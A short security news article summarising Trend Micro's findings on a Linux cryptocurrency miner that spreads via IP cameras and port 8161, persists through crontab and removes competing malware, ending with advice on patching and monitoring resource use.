14 DAY TRIAL // Coin miners have become the new norm in the malware world, and new versions are getting more complex, being able to hide their processes more effectively in order to avoid detection.
But security vendor Trend Micro has recently come across a new Linux coin miner whose purpose isn’t only to run without users being aware of it, but to also remove the other malware and miners that are found on a compromised system.
In an analysis of the script, the security company explains that it uses code from KORKERDS and relies on crontabs to make sure it launches after reboot.
The script that the malware uses for spreading downloads a modified version of XMR-Stak, a cryptocurrency miner that is specifically aimed at Cryptonight currencies and which can use the most CPUs, as well as NVIDIA and AMD GPUs for its processes.
Using all available resources
Trend Micro explains that the virus targets systems via IP cameras and web services on TCP port 8161, which the attacker uses to send a crontab file with the purpose of download a shell script.
Once the script reaches a target device, it removes all malware, coin miners, and services associated with these, in an attempt to use all available resources for its own mining tasks. By killing off the other miners and forms of malware on a system, the script makes sure that the resources of the computers are always available for its processes.
“While a malware routine that includes the removal of other malware in the system is not new, we’ve never seen the removal of Linux malware from the system on this scale. Removing competing malware is just one way cybercriminals are maximizing their profit,” Trend Micro explains.
As always, keeping systems up-to-date and tracking resource usage is the best way to stay protected against coin miners, as they typically use all the available resources and cause a noticeable slowdown in device performance.